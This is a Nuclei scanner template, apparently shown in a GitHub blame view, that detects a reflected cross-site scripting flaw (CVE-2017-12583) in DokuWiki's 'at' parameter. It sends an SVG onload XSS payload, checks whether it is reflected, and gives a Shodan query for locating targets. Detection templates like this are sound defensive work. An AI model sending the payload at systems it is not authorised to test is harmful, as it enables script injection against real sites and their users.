nuclei-templates/http/cves/2017/CVE-2017-12583.yaml

45 lines
1.4 KiB
YAML
Raw Normal View History

id: CVE-2017-12583
info:
name: DokuWiki - Cross-Site Scripting
author: DhiyaneshDK
severity: medium
description: DokuWiki through 2017-02-19b contains a cross-site scripting vulnerability in the DATE_AT parameter to doku.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
- https://github.com/splitbrain/dokuwiki/issues/2061
- https://nvd.nist.gov/vuln/detail/CVE-2017-12583
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2017-12583
cwe-id: CWE-79
2023-07-11 19:49:27 +00:00
epss-score: 0.001
cpe: cpe:2.3:a:dokuwiki:dokuwiki:*:*:*:*:*:*:*:*
metadata:
max-request: 1
shodan-query: http.title:"DokuWiki"
2023-07-11 19:49:27 +00:00
vendor: dokuwiki
product: dokuwiki
2022-04-14 08:33:28 +00:00
tags: cve,cve2017,xss,dokuwiki
http:
- method: GET
path:
2022-04-14 08:44:00 +00:00
- '{{BaseURL}}/dokuwiki/doku.php?id=wiki:welcome&at=<svg%20onload=alert(document.domain)>'
matchers-condition: and
matchers:
- type: word
part: body
words:
2022-04-14 08:44:00 +00:00
- 'Unable to parse at parameter "<svg onload=alert(document.domain)>".</div>'
- type: word
part: header
words:
- 'text/html'
- type: status
status:
- 200